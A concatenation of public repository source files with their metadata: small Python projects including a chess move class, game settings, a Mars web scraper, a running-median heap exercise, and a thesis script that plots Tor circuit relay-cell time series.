# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# System imports
# Project imports
class Action(object):
ACTION_UNDO = 'UNDO'
ACTION_MOVE = 'MOVE'
ACTION_CAPTURE = 'CAPTURE'
def __init__(
self,
action_type,
source,
destination,
captured=None,
):
self.type_ = action_type
self.source = source
self.destination = destination
self.captured = captured
def undo(self):
return Action(
self.ACTION_UNDO,
self.destination,
self.source,
self.captured,
)
def copy(self):
return Action(
self.type_,
self.source,
self.destination,
self.captured,
)
def __len__(self):
return 1
def __eq__(self, other):
if other is None:
return False
if self.type_ != other.type_:
return False
if self.source != other.source:
return False
if self.destination != other.destination:
return False
if self.captured != other.captured:
return False
return True
def __repr__(self):
return self.__str__()
def __str__(self):
return "{0} :: <{1}, {2}> -> <{3}, {4}>".format(
self.type_,
self.source[0],
self.source[1],
self.destination[0],
self.destination[1]
)
|
[
"sven.osterwalder@gmail.com"
] |
sven.osterwalder@gmail.com
|
67124ec1d96da05dd8371cdfe96260d5600890e8
|
45ffc0be0c6952cd7b503485e5c50fdc619b0601
|
/venv/settings.py
|
a304eab9e003e7a27169e4da389635a7237ab2f6
|
[] |
no_license
|
Quanny02/Alien_invasion
|
8f86854ea445e165b3ed28bd2c042c654c8f0803
|
7d8639bce39faecf2f388652389e51920bf47894
|
refs/heads/master
| 2020-03-16T22:25:06.412758
| 2018-05-29T11:59:55
| 2018-05-29T11:59:55
| 133,038,358
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 506
|
py
|
class Settings():
"""A class to store all setting s for Alien Invasion"""
def __init__(self):
"""Initialize the game's settings."""
#screen settings
self.screen_width =1200
self.screen_height = 800
self.bg_color = (230, 230, 230)
#ship settings
self.ship_speed_factor = 1.5
#bullets settings
self.bullet_speed_facotr = 1
self.bullet_width = 3
self.bullet_height = 15
self.bullet_color = 60, 60, 60
|
[
"james.ellisjr@stu.jefferson.kyschools.us"
] |
james.ellisjr@stu.jefferson.kyschools.us
|
dd1240297f91dad4af698a16309dfc8c8652efa8
|
09fe5ec73326265ccdc05778baa35dd59acb1dd4
|
/Missions_to_Mars/scrape_mars.py
|
0085ecad12f50add3ebbe7c9cf64a8e3faa915b2
|
[] |
no_license
|
Alvin1359/missions-to-mars-webscraping
|
b1b51cad9e2065b3528cf89880c476c4911a995e
|
8880d79db63dda1ab2118ded406ff0c524428e4f
|
refs/heads/main
| 2023-05-27T19:59:19.442287
| 2021-06-14T15:21:59
| 2021-06-14T15:21:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,372
|
py
|
import pandas as pd
from splinter import Browser
from bs4 import BeautifulSoup
import time
from webdriver_manager.chrome import ChromeDriverManager
def scrape_info():
# Splinter setup
executable_path = {'executable_path': ChromeDriverManager().install()}
browser = Browser('chrome', **executable_path, headless=False)
# Visit URL
url = ('https://redplanetscience.com/')
browser.visit(url)
html = browser.html
soup = BeautifulSoup(html, 'html.parser')
# Scrape news title
news_title = soup.find_all('div', class_='content_title')[0].text
# Scarpe news paragraph
news_p = soup.find_all('div', class_='article_teaser_body')[0].text
# Visit URL
url = 'https://spaceimages-mars.com/'
browser.visit(url)
html = browser.html
soup = BeautifulSoup(html, 'html.parser')
partial_url = soup.find_all('a',class_="showimg")[0]['href']
featured_image_url = url + partial_url
# Mars Facts table
url = 'https://galaxyfacts-mars.com/'
mars_facts = pd.read_html(url)
mars_facts_df = mars_facts[0]
header_row = 0
mars_facts_df.columns = mars_facts_df.iloc[header_row]
mars_facts_df = mars_facts_df.drop(header_row)
mars_facts_df = mars_facts_df.reset_index(drop=True)
mars_facts_html = mars_facts_df.to_html(index=False, classes="table table-striped table-responsive")
# Visit URL
url = 'https://marshemispheres.com/'
browser.visit(url)
soup = BeautifulSoup(browser.html, 'html.parser')
titles = soup.find_all('h3')[:-1]
title_ls = []
for title in titles:
title_ls.append(title.text)
url_ls = []
for title in title_ls:
url = 'https://marshemispheres.com/'
browser.visit(url)
browser.click_link_by_partial_text(title)
html = browser.html
soup = BeautifulSoup(browser.html, 'html.parser')
image_url = soup.find_all('li')[0].a["href"]
dictionary = {"title": title,"image_url":url + image_url}
url_ls.append(dictionary)
# Store data in a dictionary
mars_data = {
"NewsTitle": news_title,
"NewsPara": news_p,
"FeaturedImg": featured_image_url,
"MarsFacts": mars_facts_html,
"Hemispheres": url_ls,
}
# Close the browser after scraping
browser.quit()
# Return results
return mars_data
|
[
"alvinjaylucero1@gmail.com"
] |
alvinjaylucero1@gmail.com
|
af0ff074d35191259400a9937db81997e7772ffd
|
d52cb4c2e880875944b14da0b8a9542235942ac8
|
/geeksforgeeks/heap/6_Find_median_in_stream.py
|
521a8f79468f59a0c175f5766c7681ae8d0a619c
|
[] |
no_license
|
saparia-data/data_structure
|
fbd61535b68f92143b2cb2679377c0f56f424670
|
2e8700cfdaeefe0093e5b4fb2704b1abcd300d02
|
refs/heads/master
| 2023-05-08T18:54:52.250941
| 2021-06-04T05:44:29
| 2021-06-04T05:44:29
| 296,071,146
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,382
|
py
|
'''
Given an input stream of N integers.
The task is to insert these numbers into a new stream and find the median of the stream formed by each insertion of X to the new stream.
Example 1:
Input:
N = 4
X[] = 5,15,1,3
Output:
5
10
5
4
Explanation:Flow in stream : 5, 15, 1, 3
5 goes to stream --> median 5 (5)
15 goes to stream --> median 10 (5,15)
1 goes to stream --> median 5 (5,15,1)
3 goes to stream --> median 4 (5,15,1 3)
'''
import heapq
min_heap = []
max_heap = []
def balanceHeaps():
'''
use globals min_heap and max_heap, as per declared in driver code
use heapify modules , already imported by driver code
Balance the two heaps size , such that difference is not more than one.
'''
if abs(len(min_heap)-len(max_heap)) <= 1:
return # already balanced
# take out one element from top of heap with greater size, and push in other heap
if len(min_heap)>len(max_heap): # min_heap has more data
value_top = heapq.heappop(min_heap)
# push in max heap, using negative as it is implemented on min heap
heapq.heappush(max_heap,-1*value_top) # value inserted in max heap
else:
# take from max heap and insert in min heap
value_top = -1* heapq.heappop(max_heap) # negate it to get original value
heapq.heappush(min_heap,value_top) # insert value in min heap
return
def getMedian():
'''
use globals min_heap and max_heap, as per declared in driver code
use heapify modules , already imported by driver code
:return: return the median of the data received till now.
'''
# cases with odd number of elements in data
if len(max_heap)>len(min_heap):
# return the element from top of max_heap
value = heapq.heappop(max_heap)
heapq.heappush(max_heap,value) # push element back in max heap
return (-1*value)
elif len(min_heap)>len(max_heap):
# return the top element from min heap
value = heapq.heappop(min_heap)
heapq.heappush(min_heap,value)
return value
else:
# the number of elements is even in data, return the average of the two values
val_min = heapq.heappop(min_heap)
val_max = -1*heapq.heappop(max_heap)
# push these values back in the heap
heapq.heappush(min_heap,val_min)
heapq.heappush(max_heap,-1*val_max)
return ((val_max+val_min)//2) # return the average of the two
def insertHeaps(x):
'''
use globals min_heap and max_heap, as per declared in driver code
use heapify modules , already imported by driver code
:param x: value to be inserted
:return: None
'''
# if top of min heap is less than x, x belongs in upper half
least_upperhalf = heapq.heappop(min_heap) if len(min_heap) else -1 # minimum element of upper half or -1 if empty
# if popped, push in min_heap again
if least_upperhalf!=-1:
heapq.heappush(min_heap,least_upperhalf)
if x >= least_upperhalf :
heapq.heappush(min_heap,x) # insert in min_heap
else:
# x belongs in lower half
# as this is a max_heap implemented on heapq, hence negative of x will be inserted to maintain
# max heap property.
heapq.heappush(max_heap,-1*x)
arr = [5,15,1,3]
n = len(arr)
for i in range(n):
insertHeaps(arr[i])
balanceHeaps()
print(getMedian())
|
[
"saparia.ashvin@tavant.com"
] |
saparia.ashvin@tavant.com
|
0f02c8e716a5430048e7a6238850eacba01fa71a
|
f9c1c3523905e511d206187321b53ad39bbe5751
|
/import.py
|
9ddd2be3508219ec3a8d5a6575fac8ef8d1b9dcd
|
[] |
no_license
|
amrrsharaff/daisy-hacks
|
4f5acc0313a8740633a65ce6086649ddb720b35e
|
c69c5fb287c62b90981acdf8ae366efca14acb84
|
refs/heads/master
| 2021-05-09T02:23:34.629595
| 2018-02-05T23:11:08
| 2018-02-05T23:11:08
| 119,207,392
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,358
|
py
|
import tensorflow as tf
import csv
import pandas
# Metadata describing the text columns
COLUMNS = ['date_', 'store',
'department', 'item',
'unit_price','on_promotion', 'promotion_type', 'quantity']
FIELD_DEFAULTS = [[0.0], [0.0], [0.0], [0.0], [0], [0], [0], [0]]
def _parse_line(line):
# Decode the line into its fields
fields = tf.decode_csv(line, FIELD_DEFAULTS)
# Pack the result into a dictionary
features = dict(zip(COLUMNS,fields))
# Separate the label from the features
label = features.pop('quantity')
print(line)
#print(features)
return features, label
def train_input_fn(features, labels, batch_size):
"""An input function for training"""
# Convert the inputs to a Dataset.
dataset = tf.data.Dataset.from_tensor_slices((dict(features), labels))
# Shuffle, repeat, and batch the examples.
dataset = dataset.shuffle(1000).repeat().batch(batch_size)
# Build the Iterator, and return the read end of the pipeline.
return dataset.make_one_shot_iterator().get_next()
if __name__ == "__main__":
# All the inputs are numeric
dataframe = pandas.read_csv('/Users/ASharaf/Desktop/hackathon_data/trial.csv', header=0)
features = pandas.read_csv('/Users/ASharaf/Desktop/hackathon_data/trial.csv', header=0)
label = features.pop('quantity')
|
[
"noreply@github.com"
] |
amrrsharaff.noreply@github.com
|
dd8e7febbbd200e6c38975d76ce0e0646f3d7a4f
|
d5ef8f9ba3fc9a3af95c9c480eca3453606ed2d2
|
/isup_parameters/RedirectingNumberFlag.py
|
cde06ec3cad46959bfcbcc871df73e9314bef8a2
|
[] |
no_license
|
sureshrasa/isupds
|
ab0b643dc64923b55b679e2a19b88b7b11ab1c6b
|
cc4bb976dfcdd30719766051485956dfb6da169a
|
refs/heads/master
| 2020-03-21T15:27:08.613505
| 2018-06-26T09:57:21
| 2018-06-26T09:57:21
| 138,713,217
| 0
| 0
| null | null | null | null |
WINDOWS-1252
|
Python
| false
| false
| 473
|
py
|
#
# Author(s): Suresh Rasakulasuriar
#
# Copyright: © Resilientplc.com Ltd. 2018 - All Rights Reserved
#
from enum import IntEnum, unique
@unique
class RedirectingNumberFlag(IntEnum):
OddAddressSignals = 0
UNRECOGNISED = 0xFFFF
class RedirectingNumberFlagDict:
_dict = {
0 : RedirectingNumberFlag.OddAddressSignals }
@staticmethod
def lookup(ordinal):
return RedirectingNumberFlagDict._dict.get(ordinal, ordinal)
|
[
"suresh@suriar.me.uk"
] |
suresh@suriar.me.uk
|
80ba85293b15a3a17058013b70da20e139f12445
|
bd69b2c0737b25344f40d34870ebe59a70dde19f
|
/exploratory.py
|
a224cefb2e6de87f3001f0e667dff62a0b75eb39
|
[] |
no_license
|
shalisap/thesis-code
|
0e15a9014cbfdc61d40ce39c87422e507ca3f491
|
049aa1b469f6ccf02d7c6b2f3c7724d17656b7cc
|
refs/heads/master
| 2021-05-28T23:15:37.173771
| 2015-04-30T16:41:26
| 2015-04-30T16:41:26
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 18,086
|
py
|
"""
Create visualizations for time series data from parsed, windowed log files.
Supports horizon plots and color plots for random samples, histogram of
distribution characteristics, and single series time plots.
Syntax: python exploratory.py -summarize logfile.pickle
python exploratory.py -horizon logfile.pickle rand_seed
python exploratory.py -colorplots logfile.pickle rand_seed
python exploratory.py -timeplot logfile.pickle ts_ident
rand_seed determines which 1000 series random sample is taken from the record set.
ts_ident is the identifier of the single series to view, in the
format 'circ_id,ip_slug'.
@author: Julian Applebaum
@author: Shalisa Pattarawuttiwong
Last Edited: 08/04/14
-modified doTimeplot to plot multiple line graphs
"""
from scipy.stats import skew, pearsonr
from numpy import mean, std, median, linspace, correlate
from matplotlib.colors import LinearSegmentedColormap, ListedColormap
from matplotlib.patches import Rectangle
from sklearn.cluster import k_means
from pprint import pprint
from math import sqrt
from sequence_utils import trim_inactive_preprocess, flatten
import matplotlib.pyplot as plt
from matplotlib import cm
import pylab
import sys, cPickle, subprocess, random
from glob import glob
N_HIST_BINS = 100
N_CLUSTERS = 6
VMAX = 700
MAX_OBS = 1500
artist_ident_map = {}
def draw_sample(data, n=1000):
"""
Draw a random sample from a list
@param data: the list
@param n: the size of the sample
@return: a size n random sample of data
"""
random.shuffle(data)
return data[:n]
def on_pick(event):
"""
Pull up the time plot for a series when the user clicks on it.
@param event: The picking event fired by the click
"""
ident = artist_ident_map[event.artist]
print "Loading time series for circuit %s" % ident
bash_call = "python exploratory.py -timeplot %s 1000 %i,%i" % (filepath,
ident[0], ident[1])
subprocess.call(bash_call, shell=True)
def autocorrelate(series, lag=1):
"""
Perform Pearson autocorrelation on a time series
@param series: the time series
@param lag: the lag
@return: the autocorrelation coefficient
"""
shifted = series[0:len(series)-1-lag]
series_cutoff = series[lag:len(series)-1]
return pearsonr(series_cutoff, shifted)[0]
def acorr_plot(series, ax):
"""
Generate a correlogram for a series for all possible lag values.
@param series: the time series
@param ax: the axes object to draw the plot on
"""
corrs = []
for i in xrange(1, len(series)-1):
corrs.append(autocorrelate(series, i))
plt.title("Correlogram")
plt.xlabel("Lag")
plt.ylabel("Pearson Correlation")
ax.bar(range(1, len(corrs)+1), corrs, width=1)
plt.ylim([-1, 1])
def summarize(values, name):
"""
Print out summary stats for a list of values
@param values: The values to summarize
@param name: The name to display in the printed text
"""
border_len = len(name) + 8
print "*" * border_len
print "***", name, "***"
print "Mean:", mean(values)
print "Min:", min(values)
print "Max:" , max(values)
print "Std Dev:", std(values)
print "*" * border_len, "\n"
def discretize(relay_series):
"""
Cluster the observations in relay_series into k bins, and replace each
observation with its cluster label.
@param relay_series: the list of series to discretize
@param k: the number of clusters to create
@return: (relay_series, cluster_ranges). relay_series is the list of
discretized series. cluster_ranges is a list of cluster mins and maxs
in s.t. cluster_ranges[i] = (min(cluster_i), max(cluster_i))
"""
cluster_maxes = [0 for i in xrange(0, k)]
cluster_mins = [float("inf") for i in xrange(0, k)]
all_window_counts = reduce(list.__add__, relay_series, [])
vectorized = [[o] for o in all_window_counts]
idx = 0
for series in relay_series:
for i in xrange(0, len(series)):
label = labels[idx]
cluster_maxes[label] = max(cluster_maxes[label], series[i])
cluster_mins[label] = min(cluster_mins[label], series[i])
series[i] = label
idx += 1
cluster_ranges = zip(sorted(cluster_mins), sorted(cluster_maxes))
return (relay_series, cluster_ranges)
def do_summarize(records):
"""
Display summary histograms for the series in records.
@param records: the circuit records
"""
circ_len_aggr = []
in_mean_cells_per_window_aggr = []
in_min_cells_per_window_aggr = []
in_max_cells_per_window_aggr = []
in_median_cells_per_window_aggr = []
in_stddev_cells_per_window_aggr = []
in_inst_counts_aggr = []
#unique_vals_aggr = []
percent_active_aggr = []
time_active_aggr = []
out_mean_cells_per_window_aggr = []
out_min_cells_per_window_aggr = []
out_max_cells_per_window_aggr = []
out_median_cells_per_window_aggr = []
out_stddev_cells_per_window_aggr = []
out_inst_counts_aggr = []
for record in records:
relays = record['relays']
in_relays = [r[0] for r in relays]
out_relays = [r[1] for r in relays]
circ_len_aggr.append((record['destroy'] - record['create'])/1000.0)
in_mean_cells_per_window_aggr.append(1.0*sum(in_relays)/len(in_relays))
out_mean_cells_per_window_aggr.append(1.0*sum(out_relays)/len(out_relays))
in_median_cells_per_window_aggr.append(median(in_relays))
out_median_cells_per_window_aggr.append(median(out_relays))
in_min_cells_per_window_aggr.append(min(in_relays))
out_min_cells_per_window_aggr.append(min(out_relays))
in_max_cells_per_window_aggr.append(max(in_relays))
out_max_cells_per_window_aggr.append(max(out_relays))
in_stddev_cells_per_window_aggr.append(std(in_relays))
out_stddev_cells_per_window_aggr.append(std(out_relays))
in_inst_counts_aggr += in_relays
out_inst_counts_aggr += out_relays
# unique_vals_aggr.append(len(set(filter(lambda o: o > 2, relays))))
time_active = len(trim_inactive_preprocess(relays))
percent_active_aggr.append(100.0*time_active/len(relays))
# time_active_aggr.append(time_active)
fig = plt.figure()
summarize(in_max_cells_per_window_aggr, "Max IN")
summarize(out_max_cells_per_window_aggr, "Max OUT")
meansplot = fig.add_subplot(421)
plt.title("Mean Cells/Window")
plt.xlabel("Mean Cells/Window")
plt.ylabel("Frequency")
plt.yscale('log')
meansplot.hist(in_mean_cells_per_window_aggr, bins=N_HIST_BINS, alpha=0.5, label='in')
meansplot.hist(out_mean_cells_per_window_aggr, bins=N_HIST_BINS, alpha=0.5, label='out')
cellsplot = fig.add_subplot(422)
plt.title("Median Cells/Window")
plt.xlabel("Median Cells/Window")
plt.ylabel("Frequency")
plt.yscale('log')
cellsplot.hist(in_median_cells_per_window_aggr, bins=N_HIST_BINS, alpha=0.5, label='in')
cellsplot.hist(out_median_cells_per_window_aggr, bins=N_HIST_BINS, alpha=0.5, label='out')
minsplot = fig.add_subplot(423)
plt.title("Min Cells/Window")
plt.xlabel("Min Cells/Window")
plt.ylabel("Frequency")
plt.yscale('log')
minsplot.hist(in_min_cells_per_window_aggr, bins=N_HIST_BINS, alpha=0.5, label='in')
minsplot.hist(out_min_cells_per_window_aggr, bins=N_HIST_BINS, alpha=0.5, label='out')
maxsplot = fig.add_subplot(424)
plt.title("Max Cells/Window")
plt.xlabel("Max Cells/Window")
plt.ylabel("Frequency")
plt.yscale('log')
maxsplot.hist(in_max_cells_per_window_aggr, bins=N_HIST_BINS, alpha=0.5, label="in")
maxsplot.hist(out_max_cells_per_window_aggr, bins=N_HIST_BINS, alpha=0.5, label="out")
stddevsplot = fig.add_subplot(425)
plt.title("Std Dev. of Cells/Window")
plt.xlabel("Std Dev. of Cells/Window")
plt.ylabel("Frequency")
plt.yscale('log')
stddevsplot.hist(in_stddev_cells_per_window_aggr, bins=N_HIST_BINS, alpha=0.5, label='in')
stddevsplot.hist(out_stddev_cells_per_window_aggr, bins=N_HIST_BINS, alpha=0.5, label='out')
cellsplot = fig.add_subplot(426)
plt.title("Single Window Cell Count")
plt.xlabel("Single Window Cell Count")
plt.ylabel("Frequency")
plt.yscale('log')
cellsplot.hist(in_inst_counts_aggr, bins=N_HIST_BINS, alpha=0.5, label='in')
cellsplot.hist(out_inst_counts_aggr, bins=N_HIST_BINS, alpha=0.5, label='out')
lenplot = fig.add_subplot(427)
plt.title("Circuit Length (seconds)")
plt.xlabel("Circuit Length (seconds)")
plt.ylabel("Frequency")
plt.yscale('log')
lenplot.hist(circ_len_aggr, bins=N_HIST_BINS)
# uniqueplot = fig.add_subplot(338)
# plt.title("Number of Unique Values > 1")
# plt.xlabel("Number of Unique Values > 1")
# plt.ylabel("Frequency")
# uniqueplot.hist(unique_vals_aggr, bins=N_HIST_BINS)
# timeactiveplot = fig.add_subplot(428)
# plt.title("Percent of Time in Active State")
# plt.xlabel("Percent of Time")
# plt.ylabel("Frequency")
# timeactiveplot.hist(percent_active_aggr, bins=N_HIST_BINS)
fig.tight_layout()
def do_horizon(records, window_size, ylim=None):
"""
Display a horizon plot for a size 1000 random sample of records
@param records: the circuit records
@param window_size: the size of the cell count windows
"""
sample = draw_sample(records)
fig = plt.figure()
fig.canvas.mpl_connect('pick_event', on_pick)
ax = fig.add_subplot(2,2,1)
plt.title("Inbound Horizon Plot (n=%i)" % len(sample))
plt.xlabel("Window # (%i ms windows)" % window_size)
plt.ylabel("Ingoing Relay Cells/Window")
plt.grid(True)
for record in sample:
s = record['relays']
series = [i[0] for i in s]
# use fill_between to avoid some rendering bugs
artist = ax.fill_between(range(0, len(series)), series, [0]*len(series),
alpha=.2, color='black', edgecolor='none', picker=True)
artist_ident_map[record['ident']] = artist
ay = fig.add_subplot(2,2,3)
plt.title("Outbound Horizon Plot (n=%i)" % len(sample))
plt.xlabel("Window # (%i ms windows)" % window_size)
plt.ylabel("Outgoing Relay Cells/Window")
plt.grid(True)
for record in sample:
s = record['relays']
series = [i[1] for i in s]
# use fill_between to avoid some rendering bugs
artist = ay.fill_between(range(0, len(series)), series, [0]*len(series),
alpha=.2, color='black', edgecolor='none', picker=True)
artist_ident_map[record['ident']] = artist
fig.tight_layout()
if ylim is not None:
pylab.ylim([0, ylim])
def do_timeplot(records, window_size, ts_ident_list):
"""
Display a time plot and a correlogram for multiple time series
@param records: the list of circuits records containing the series
@param window_size: the size of the cell count windows
@param ts_ident: the list of [(circ_id, ip_slug)]
tuples identifying the series
"""
subplot_size = 421
fig = plt.figure()
# have to do this once first to be able to scale the subplots to the same scale
rstr, cstr, ipstr = ts_ident_list[0].split(",")
rstr = rstr.replace("(", "")
cstr = cstr.replace(")", "")
fig.canvas.set_window_title("%s-%i-%i-%i" % (rstr, int(cstr),
int(ipstr), window_size))
timeplot = fig.add_subplot(subplot_size)
for record in records:
if record['ident'] == ((rstr, int(cstr)), int(ipstr)):
s = record['relays']
in_series = [i[0] for i in s]
out_series = [i[1] for i in s]
plt.plot(in_series)
plt.plot(out_series)
subplot_size += 1
for ident in ts_ident_list[1:]:
rstr, cstr, ipstr = ident.split(",")
rstr = rstr.replace("(","")
cstr = cstr.replace(")","")
fig.canvas.set_window_title("%s-%i-%i-%i" % (rstr, int(cstr), int(ipstr), window_size))
timeplot1 = fig.add_subplot(subplot_size, sharex=timeplot, sharey=timeplot)
# acorrplot = fig.add_subplot(122)
for record in records:
if record['ident'] == ((rstr, int(cstr)), int(ipstr)):
plt.xlabel("Window # (%i ms windows)" % window_size)
plt.ylabel("Ingoing Relay Cell Count")
s = record['relays']
in_series = [i[0] for i in s]
# line graphs
plt.plot(in_series)
plt.xlabel("Window # (%i ms windows)" % window_size)
plt.ylabel("Outgoing Relay Cell Count")
out_series = [i[1] for i in s]
# line graphs
plt.plot(out_series)
# timeplot.fill_between(range(0, len(series)), series, [0]*len(series),
# color='grey')
# acorr_plot(series, acorrplot)
subplot_size += 1
fig.text(0.5, 0.04, 'Window # (%i ms windows)'% window_size, ha='center', va='center')
fig.text(0.06, 0.5, 'Outgoing Relay Cell Count', ha='center', va='center', rotation='vertical')
# outbound only
def do_colorplot(records, window_size, ax=None, ay=None, no_chrome=False,
sample_size=1000):
"""
Display a color plots for a size 1000 random sample of records
@param records: the circuit records
@param window_size: the size of the cell count windows
"""
def rec_cmp(rec_1, rec_2):
relays_1, relays_2 = rec_1['relays'], rec_2['relays']
m_r1, m_r2= ((mean([i[0] for i in relays_1]) +
mean([i[1] for i in relays_1])),
(mean([i[0] for i in relays_2]) +
mean([i[1] for i in relays_2])))
if len(relays_1) == len(relays_2):
if m_r1 == m_r2: return 0
elif m_r1 > m_r2: return 1
else: return -1
elif len(relays_1) > len(relays_2):
return 1
else:
return -1
sample = draw_sample(records, sample_size)
sample.sort(cmp=rec_cmp)
N_CLUSTERS = 6
colors =[(1.0*i/N_CLUSTERS,)*3 for i in xrange(1, N_CLUSTERS+1)]
cmap = ListedColormap(colors)
relay_series = [record['relays'] for record in sample]
out_relay_series = []
for r in relay_series:
newTupOut = []
for tup in r:
newTupOut.append(tup[1])
out_relay_series.append(newTupOut)
vmin = 0
vmax = VMAX
if ax is None:
fig = plt.figure()
fig.canvas.mpl_connect('pick_event', on_pick)
ax = fig.add_subplot(111)
ax.get_yaxis().set_ticks([])
if not no_chrome:
plt.title("Outbound Luminance Plot (n=%i)" % len(sample))
plt.xlabel("Window # (%i ms windows)" % window_size)
plt.ylabel("Client")
# legend_rects = [Rectangle((0, 0), 1, 1, fc=c) for c in reversed(colors)]
# legend_labels = ["%i-%i cells" % c for c in reversed(cluster_ranges)]
# plt.legend(legend_rects, legend_labels, loc=4)
n = 0
for i in xrange(0, len(sample)):
series = out_relay_series[i]
ident = sample[i]['ident']
artist = ax.scatter(range(0, len(series)), [n]*len(series),
c=series, marker="s", edgecolors='none', vmin=vmin, vmax=40,
cmap=cm.gray, picker=True)
n += 2
artist_ident_map[ident] = artist
if not no_chrome:
fig.colorbar(artist)
# inbound and outbound
def do_colorplot_both(records, window_size, ax=None, ay=None, no_chrome=False,
sample_size=1000):
"""
Display a color plots for a size 1000 random sample of records
@param records: the circuit records
@param window_size: the size of the cell count windows
"""
def rec_cmp(rec_1, rec_2):
relays_1, relays_2 = rec_1['relays'], rec_2['relays']
m_r1, m_r2= ((mean([i[0] for i in relays_1]) +
mean([i[1] for i in relays_1])),
(mean([i[0] for i in relays_2]) +
mean([i[1] for i in relays_2])))
if len(relays_1) == len(relays_2):
if m_r1 == m_r2: return 0
elif m_r1 > m_r2: return 1
else: return -1
elif len(relays_1) > len(relays_2):
return 1
else:
return -1
sample = draw_sample(records, sample_size)
sample.sort(cmp=rec_cmp)
N_CLUSTERS = 6
colors =[(1.0*i/N_CLUSTERS,)*3 for i in xrange(1, N_CLUSTERS+1)]
cmap = ListedColormap(colors)
relay_series = [record['relays'] for record in sample]
in_relay_series = []
out_relay_series = []
for r in relay_series:
newTupIn = []
newTupOut = []
for tup in r:
newTupIn.append(tup[0])
newTupOut.append(tup[1])
in_relay_series.append(newTupIn)
out_relay_series.append(newTupOut)
vmin = 0
vmax = VMAX
if ax is None:
fig = plt.figure()
fig.canvas.mpl_connect('pick_event', on_pick)
ax = fig.add_subplot(221)
ax.get_yaxis().set_ticks([])
if not no_chrome:
plt.title("Inbound Luminance Plot (n=%i)" % len(sample))
plt.xlabel("Window # (%i ms windows)" % window_size)
plt.ylabel("Client")
# legend_rects = [Rectangle((0, 0), 1, 1, fc=c) for c in reversed(colors)]
# legend_labels = ["%i-%i cells" % c for c in reversed(cluster_ranges)]
# plt.legend(legend_rects, legend_labels, loc=4)
n = 0
for i in xrange(0, len(sample)):
series = in_relay_series[i]
ident = sample[i]['ident']
artist = ax.scatter(range(0, len(series)), [n]*len(series),
c=series, marker="s", edgecolors='none', vmin=vmin, vmax=vmax,
cmap=cm.gray, picker=True)
n += 2
artist_ident_map[ident] = artist
if ay is None:
ay = fig.add_subplot(223)
ay.get_yaxis().set_ticks([])
if not no_chrome:
plt.title("Outbound Luminance Plot (n=%i)" % len(sample))
plt.xlabel("Window # (%i ms windows)" % window_size)
plt.ylabel("Client")
# legend_rects = [Rectangle((0, 0), 1, 1, fc=c) for c in reversed(colors)]
# legend_labels = ["%i-%i cells" % c for c in reversed(cluster_ranges)]
# plt.legend(legend_rects, legend_labels, loc=4)
n = 0
for i in xrange(0, len(sample)):
series = out_relay_series[i]
ident = sample[i]['ident']
artist = ay.scatter(range(0, len(series)), [n]*len(series),
c=series, marker="s", edgecolors='none', vmin=vmin, vmax=vmax,
cmap=cm.gray, picker=True)
n += 2
artist_ident_map[ident] = artist
fig.tight_layout()
if not no_chrome:
fig.subplots_adjust(right=1.0)
cbar_ax = fig.add_axes([0.55, 0.15, 0.025, 0.7])
fig.colorbar(artist, cax=cbar_ax)
if __name__ == "__main__":
graphing_mode = sys.argv[1]
inpath = sys.argv[2]
if len(sys.argv) > 4: seed = int(sys.argv[3])
else: seed = 0
print "Random seed =", seed
random.seed(seed)
ts_ident_list = []
with open(inpath) as data_file:
print "Reading data..."
data = cPickle.load(data_file)
window_size, records = data['window_size'], data['records']
if graphing_mode == "-timeplot":
for arg in range(len(sys.argv)):
if arg >= 5:
ts_ident_list.append(sys.argv[arg])
elif graphing_mode == "-agg-colorplots":
k_val = int(sys.argv[4])
records = filter(lambda r: r['ident'] == (k_val, k_val), records)
print "%i series" % len(records)
print "Graphing..."
if graphing_mode == '-summarize':
do_summarize(records)
elif graphing_mode == '-horizon':
do_horizon(records, window_size)
elif graphing_mode == '-timeplot':
do_timeplot(records, window_size, ts_ident_list)
elif graphing_mode == '-colorplots':
do_colorplot(records, window_size)
elif graphing_mode == '-agg-colorplots':
do_colorplot(records, window_size)
do_horizon(records, window_size, MAX_OBS)
else:
print "ERROR: Invalid graphing mode selected"
plt.show()
|
[
"spattarawutt@gmail.com"
] |
spattarawutt@gmail.com
|
85a7bdd7a9ae0094ba0970d2c19c7db253851acb
|
4b866626551640b701274cc1f6a8ea8966199c2d
|
/2019/Day_07/day7_Amplification_Circuit_Class.py
|
75f27a0663e2174a2a88387170563beb80085fc8
|
[] |
no_license
|
MaxTechniche/AdventOfCode
|
5a496b03c4348214a3abd990c5de8e10bd3a4fff
|
8d67cc151abc686cb06770422b795307f7cff170
|
refs/heads/main
| 2023-02-03T00:55:35.057710
| 2022-12-18T23:21:47
| 2022-12-18T23:21:47
| 307,274,063
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,408
|
py
|
